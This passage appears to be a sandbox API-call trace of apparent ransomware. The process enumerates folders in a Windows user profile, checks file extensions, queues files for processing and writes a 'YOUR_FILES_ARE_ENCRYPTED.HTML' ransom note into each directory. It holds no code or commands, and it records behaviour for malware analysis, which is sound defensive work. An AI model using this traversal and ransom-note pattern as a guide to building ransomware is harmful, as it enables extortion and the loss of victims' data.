dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0168.765] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=85386) returned 1 [0168.765] GetProcessHeap () returned 0x270000 [0168.765] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7759008 [0168.768] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="A0") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="0C") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="75") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="CE") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="8E") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="AD") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="87") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="A8") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="AD") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="0F") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="F5") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="EE") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="47") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="5C") returned 2 [0168.768] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="7A") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="BF") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="82") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="1C") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="70") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="88") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="8B") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="EB") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="FB") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="10") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="95") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="C6") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="9E") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="21") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="C3") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="1F") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="FA") returned 2 [0168.769] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5F") returned 2 [0168.769] lstrcpyW (in: lpString1=0x77690bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png" [0168.770] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7759008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.770] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7759008, lpOverlapped=0x7759008) returned 1 [0168.770] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5883fd0, ftCreationTime.dwHighDateTime=0x1d7db01, ftLastAccessTime.dwLowDateTime=0x45b05900, ftLastAccessTime.dwHighDateTime=0x1d7e484, ftLastWriteTime.dwLowDateTime=0x45b05900, ftLastWriteTime.dwHighDateTime=0x1d7e484, nFileSizeHigh=0x0, nFileSizeLow=0x14d8a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ys-I5cZz8VrpRcO.png", cAlternateFileName="YS-I5C~1.PNG")) returned 0 [0168.770] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.770] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0168.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.770] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.772] CloseHandle (hObject=0x5a0) returned 1 [0168.772] GetProcessHeap () returned 0x270000 [0168.773] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.773] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0168.773] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood") returned 33 [0168.773] GetProcessHeap () returned 0x270000 [0168.773] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.773] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood" [0168.773] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood\\*" [0168.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\PrintHood\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5883fd0, ftCreationTime.dwHighDateTime=0x1d7db01, ftLastAccessTime.dwLowDateTime=0x45b05900, ftLastAccessTime.dwHighDateTime=0x1d7e484, ftLastWriteTime.dwLowDateTime=0x45b05900, ftLastWriteTime.dwHighDateTime=0x1d7e484, nFileSizeHigh=0x0, nFileSizeLow=0x14d8a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ys-I5cZz8VrpRcO.png", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.773] GetProcessHeap () returned 0x270000 [0168.774] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.774] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Recent", cAlternateFileName="")) returned 1 [0168.774] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent") returned 30 [0168.774] GetProcessHeap () returned 0x270000 [0168.774] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.774] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent" [0168.774] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent\\*" [0168.774] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Recent\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5883fd0, ftCreationTime.dwHighDateTime=0x1d7db01, ftLastAccessTime.dwLowDateTime=0x45b05900, ftLastAccessTime.dwHighDateTime=0x1d7e484, ftLastWriteTime.dwLowDateTime=0x45b05900, ftLastWriteTime.dwHighDateTime=0x1d7e484, nFileSizeHigh=0x0, nFileSizeLow=0x14d8a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ys-I5cZz8VrpRcO.png", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.774] GetProcessHeap () returned 0x270000 [0168.775] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.775] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5ba6bf0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0168.775] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games") returned 35 [0168.775] GetProcessHeap () returned 0x270000 [0168.775] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.775] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games" [0168.775] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\*" [0168.775] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5ba6bf0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0168.775] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5ba6bf0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.776] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bccd50, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.776] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\desktop.ini") returned 47 [0168.776] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.776] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.776] lstrlenW (lpString=".ini") returned 4 [0168.776] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.776] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5bccd50, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0168.776] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.776] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0168.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Saved Games\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\saved games\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.776] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.778] CloseHandle (hObject=0x5a0) returned 1 [0168.778] GetProcessHeap () returned 0x270000 [0168.779] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.779] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Searches", cAlternateFileName="")) returned 1 [0168.779] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches") returned 32 [0168.779] GetProcessHeap () returned 0x270000 [0168.779] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.779] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches" [0168.779] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\*" [0168.779] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0168.779] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24c1090, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.779] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd24029b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24029b0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5b80a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0168.779] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\desktop.ini") returned 44 [0168.779] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.779] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.779] lstrlenW (lpString=".ini") returned 4 [0168.779] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0168.779] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0168.779] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\Everywhere.search-ms") returned 53 [0168.779] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.780] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0168.780] lstrlenW (lpString=".search-ms") returned 10 [0168.780] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0168.780] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0168.780] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\Indexed Locations.search-ms") returned 60 [0168.780] lstrcmpW (lpString1="Indexed Locations.search-ms", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.780] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0168.780] lstrlenW (lpString=".search-ms") returned 10 [0168.780] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0168.780] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0168.780] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.780] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0168.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Searches\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\searches\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.780] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.782] CloseHandle (hObject=0x5a0) returned 1 [0168.782] GetProcessHeap () returned 0x270000 [0168.783] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.783] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="SendTo", cAlternateFileName="")) returned 1 [0168.783] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo") returned 30 [0168.783] GetProcessHeap () returned 0x270000 [0168.783] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.783] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo" [0168.783] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo\\*" [0168.783] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\SendTo\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.783] GetProcessHeap () returned 0x270000 [0168.784] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.784] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0168.784] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu") returned 34 [0168.784] GetProcessHeap () returned 0x270000 [0168.784] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.784] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu" [0168.784] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu\\*" [0168.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Start Menu\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, 